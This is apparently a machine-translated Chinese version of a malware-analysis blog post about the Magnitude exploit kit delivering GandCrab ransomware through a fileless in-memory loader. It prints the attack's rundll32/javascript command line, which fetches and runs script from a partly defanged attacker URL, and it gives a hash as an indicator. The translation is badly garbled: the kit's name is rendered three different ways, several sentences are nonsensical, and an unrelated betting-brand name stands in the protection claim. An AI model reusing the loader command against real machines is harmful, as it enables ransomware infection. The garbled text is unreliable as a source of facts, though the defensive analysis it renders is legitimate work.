GandCrab勒索软件正在通过malspam社会工程方案, 和利用工具运动。4月16日,我们发现了巨大的ek,这忠于自己的胶铁ransomware现在正借助杠杆将其推出GandCrab, 也。

虽然幅度ek仍然集中在朝鲜目标上,但我们能够通过重放先前录制的感染捕获来感染英语版的窗户。这是一个有趣的偏离Magniber,在避开其他地点方面做得非常彻底。

量级现在也使用一种无文件技术来加载勒索软件的有效载荷,这使得拦截和检测有点困难。这种技术的变化有几年前就知道了并被其他家族使用,如Poweliks,但他们是一个新的增加到量级。

图1:用GandCrab负载捕获的EK量级流量

该公司一直在尝试用非常规的方式加载恶意软件,例如通过二进制填充,或最近通过另一种技术,但仍然从流量或网络数据包捕获中“清楚地”暴露它。

图2:2018年4月4日的幅度ek滴胶

有效负载被编码(使用VBScript.Encode/JScript.Encode)并嵌入到脚本中,随后在内存中解码并执行。

“C: \ Windows \ System32系统\ rundll32.exe”javascript:“\ . .\ [RunHTMLApplication”;document . write (); GetObject('脚本:http://dx30z30a4t11l7be.lieslow[,]信仰/ 5 aad4b91a0da20d4faab0991bdbe7138”)

图3:无害的脚本隐藏了有效负载

在有效载荷被注入之后资源管理器,它会立即尝试重新启动计算机。如果我们暂停这个程序,使用@hasherezadePE-Sieve,我们实际上可以从内存中转储GandCrab DLL:

图4:使用PE-Sieve从内存中提取有效载荷

一旦成功感染病毒,文件将被. crab扩展名加密,同时会留下一封勒索信,说明恢复这些文件所需的下一步步骤。

图5:Gandcrab的赎金券

最近的一次执法行动为受害者提供了从以前的GandCrab感染中恢复文件的方法。但是,最新版本目前无法解密。

必威平台APP当Internet Explorer (CVE-2016-0189)或Flash Player (CVE-2018-4878)漏洞被攻击时,用户将受到保护。

时间会证明星等是否会坚持GandCrab,但这是一个值得注意的变化,因为在替换了值得信任的Cerber后,它只使用自己的Magniber勒索软件大约7个月。

妥协的指标

倾倒GandCrab DLL

9 daf74238f0f7d0e64f8bb046c136d7e61346b4c084a0c46e174a2b76f30b57a